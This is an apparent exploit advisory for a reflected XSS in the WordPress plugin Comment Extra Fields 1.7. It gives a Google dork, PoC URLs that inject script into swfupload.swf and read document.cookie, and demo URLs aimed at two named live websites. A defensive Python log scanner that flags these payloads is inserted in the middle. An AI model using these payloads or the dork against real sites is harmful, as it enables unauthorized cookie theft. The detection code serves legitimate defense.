Wordpress Plugins - Comment Extra Fields <== XSS



##################################################
# Description : Wordpress Plugins - Comment Extra Fields <== XSS
# Version : 1.7
# Link : http://wordpress.org/extend/plugins/comment-extra-field/
# Plugins : http://downloads.wordpress.org/plugin/comment-extra-field.1.7.zip
# Date : 8-1-2013
# Google Dork : inurl:/wp-content/plugins/comment-extra-field/
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################


# Description :
================
JavaScript code injection (XSRF/XSS).
A remote attacker can include remote images or execute JavaScript code.


# PoC
=====
=> XSRF/XSS Injection :
 http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS');//
 http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
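The two PoC URLs above show that swfupload.swf reflects the movieName and buttonText query parameters. As an added example from the defender's side, not part of the original advisory, here is a small Python scanner that reads web-server access-log lines and flags requests to swfupload.swf whose reflected parameters carry script-like content. The four log lines are constructed for this example, and the function and constant names (scan_log, is_suspicious, REFLECTED_PARAMS) are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not taken from any real server.
# Lines 1 and 2 carry the advisory's two PoC payloads, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jan/2013:10:01:02 +0000] "GET /wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName=%22%5D%29%3B%7Dcatch%28e%29%7B%7Dif%28%21self.a%29self.a%3D%21alert%28%27XSS%27%29%3B%2F%2F HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jan/2013:10:02:15 +0000] "GET /wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=%3Ca%20href%3D%27javascript%3Aalert%28document.cookie%29%27%3EClick%20me%3C%2Fa%3E HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.9 - - [08/Jan/2013:10:03:00 +0000] "GET /wp-content/plugins/comment-extra-field/scripts/swfupload.swf HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.10 - - [08/Jan/2013:10:04:00 +0000] "GET /index.php?s=swfupload HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and the quoted request line of the combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Query parameters that swfupload.swf reflects, as shown in the advisory's PoC.
REFLECTED_PARAMS = ("movieName", "buttonText")

# Markers that legitimate values of those parameters (plain identifiers or label text) never contain.
PAYLOAD_RE = re.compile(r"<|>|javascript:|\balert\s*\(|\)\s*;|\bcatch\s*\(", re.IGNORECASE)


def is_suspicious(value: str) -> bool:
    """True when a decoded parameter value looks like injected markup or script."""
    return PAYLOAD_RE.search(value) is not None


def scan_line(line: str) -> list:
    """Return a finding per suspicious reflected parameter in one log line (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/swfupload.swf"):
        return []
    # parse_qs percent-decodes the values, so the check runs on what the SWF would actually reflect.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in REFLECTED_PARAMS:
        for value in params.get(name, []):
            if is_suspicious(value):
                findings.append(
                    {"ip": m.group("ip"), "timestamp": m.group("ts"), "param": name, "value": value}
                )
    return findings


def scan_log(text: str) -> list:
    """Scan a whole log (one request per line) and collect all findings in order."""
    hits = []
    for line in text.splitlines():
        hits.extend(scan_line(line))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} {hit['param']}={hit['value']!r}")
```

Run against SAMPLE_LOG it reports the first two lines and stays silent on the bare request for the SWF and on the unrelated index.php hit. Any hit is also a reminder that the fix is to remove or replace the vulnerable swfupload.swf rather than to rely on log review.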


# Demo:
=======
http://cscmail.net/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
http://fitest.sitewalla.com/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>


# Thanks
=========
CyberSEC Team - TBD - 1337day - PacketStormSecurity
